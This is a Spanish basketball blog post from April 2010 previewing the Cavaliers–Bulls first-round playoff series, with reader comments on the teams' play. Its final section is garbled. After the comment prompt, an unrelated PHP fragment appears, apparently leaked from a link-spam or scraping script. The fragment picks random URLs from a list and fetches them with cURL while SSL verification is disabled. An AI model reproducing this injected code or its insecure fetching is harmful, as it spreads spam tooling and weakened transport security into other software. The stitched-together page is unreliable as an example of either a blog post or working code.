Análisis Cleveland Cavaliers vs Chicago Bulls

16 de April de 2010 por TheDeerHunter

Regular: 2-2

Cavaliers: P.Favor: 102,1 – P.Contra: 95,6
Bulls: P.Favor:  97,5 – P.Contra: 99,1

Pocos dudan que los Cavaliers van a sobrevivir a la primera ronda. En realidad nadie augura más de 5 partidos para esta serie y la cuestión, incluso dentro del propio entorno del equipo, gira en torno a si los Bulls lograrán estrenarse o no.

Ya es curioso, porque da la casualidad de que nada menos que un 10% de las derrotas que han sufrido los Cavs este año han venido de manos de los Bulls, posiblemente el equipo que más problemas le ha generado al campeón de la regular. Y además pueden desplegar en este momento su artillería al completo. Es mucho más de lo que han podido decir durante la mayor parte de la campaña.

Con todo, es incuestionable que a priori estamos una eliminatoria desigualada. Tanto por números, jugadores, alternativas tácticas… como por la propia guerra interna en la que ha vivido toda la temporada Chicago. Es casi un milagro que Del Negro siga como comandante de este barco a estas alturas.

Claves de la eliminatoria:

– Nada que ganar y mucho que perder: A nadie en Cleveland se le pasa por la cabeza tener problemas en esta primera ronda. Tampoco los han tenido apenas en toda la temporada, pero… ¿y si las cosas no empiezan de forma tan optimista como todo el mundo se espera? ¿Tiene este equipo madurez suficiente como para llevar sobre la espalda la presión de que “sólo vale el anillo”? Otros tan confiados como ellos lo han sufrido antes en sus carnes y los Bulls cuentan con antecedentes recientes de plantar cara a favoritos.

– La vuelta de Shaq: Por un lado Shaq se ha mostrado como un elemento relativamente desestabilizante en el devenir de la temporada. Este sería un muy mal momento para que pudieran surgir dudas tácticas, pero con Shaq a ciertos niveles mínimos de rendimiento, los Bulls perderían cualquier opción de contrarrestar el juego de sus rivales.

– El control del juego: Si algún punto débil puede tener Cleveland es la ausencia de un director al uso. Los Bulls sí cuentan con ello. Si obligan a Cleveland a jugar en estático y le niegan el “correcalles” tendrán mucho ganado. Si los Cavs se la juegan con su juego exterior pueden ser vulnerables.

– El factor DelNegro: Si el bueno de Vinnie sigue siendo el técnico jefe de los Bulls es únicamente por dos cosas. Porque ha demostrado que puede sacarse algún conejo de la chistera y porque sus jugadores se han matado por él en los momentos más críticos. Sería muy complicado para Paxson echar a Del Negro si eliminan a los Cavs o incluso si se marcan una serie tan increíble como la del año pasado contra los Celtics.

Agenda:

– P1: Sábado 17 a las 21h (horario España)
– P2: Lunes 19 a las 2h
– P3: Jueves 22 a la 1h
– P4: Domingo 25 a las 21:30h

Pronóstico: 4-0 Cavs

Comenta

7 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Cierto es que los Cavs no tienen un base puro, pero por su estilo de juego, tampoco creo que les haga falta un buen director, con las buenas muñecas de Mo y West tienen suficiente para apoyar a James en el juego exterior

      Citar

  2. TheDeerHunter dice:
    #2

    Por su estilo de juego no les hace falta un buen director, pero si no pueden imponer ese estilo de juego sufren.

    Eso precísamente les pasó el año pasado… sin ir más lejos, contra Orlando en final de conferencia.

      Citar

  3. Love Denise dice:
    #3

    creo que la final del Este del año pasado la desniveló Lewis. No había ningun interior de los Cavs capaz de defenderle a 7 metros; este año sí habrá, al hacerse con Jamison. De hecho, me asustan estos Cavs desde el “regalito”. Hay que reconocer que se movieron muy bien.

      Citar

  4. kantonyo dice:
    #4

    Chicago puede ser un equipo correoso como demostró ante Boston el año pasado, pero Cavs ha demostrado ultimamente una regularidad extrema ante equipos de clase media-baja, por lo que veo una eliminatoria fácil para LeBron y compañia.

      Citar

  5. TheDeerHunter dice:
    #5

    Eso es indudable, LoveD… pero si asumimos que Cleveland no podía parar a Lewis ¿qué deberíamos decir entonces acerca de LeBron? revisemos sus números en la final y comparémoslos con los del que comentas la decidió.

    Lo que quiero decir es que si llegó al escenario de que Rashard Lewis pudo desnivelar la balanza fue porque los Cavs no llegaron a imponer su juego. Se estrellaron ante un baloncesto más lento de lo deseado. Como había sucedido todo el año, Williams y demás no fueron capaces de aportar desde el lanzamiento exterior lo que Cleveland hubiera necesitado aquella serie. Aislaron al berraco de LeBron. Para mí esto fue tan clave como el desequilibrio que causó Rashard.

    No voy a descubrir nada en cuanto a que en un escenario de juego estático sin contraataques hay otros equipos más preparados que Cleveland. Esa es la baza que podría jugar Chicago.

      Citar

  6. Love Denise dice:
    #6

    bueno sí, Mo jugó bastante mal, y los pivots no hicieron nada, aún así, el bestia de James le faltó poco para apearnos el solito, menos mal que aquel triple del centro del campo no entró, que yo ya estaba con el Dodotis. Por eso me asustan más este año,

    txusma: el magic- bobcats ya ha sido enviado.

      Citar

  7. LEmontus dice:
    #7

    Para mi Bulls tiene un equipazo pero teniendo en cuenta su estilo de juego e prácticamente imposible que hagan algo. No ves un balón al poste,(en los pocos minutos de warrick quizás), no ves canastas fáciles todo piedras de rose y hnrich que como son muy buenos pues meten bastante. Yo creo que casis seguro Vinnie será cortado por el bien de bulls por mucho que tnga el apoyo de sus jugadores.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>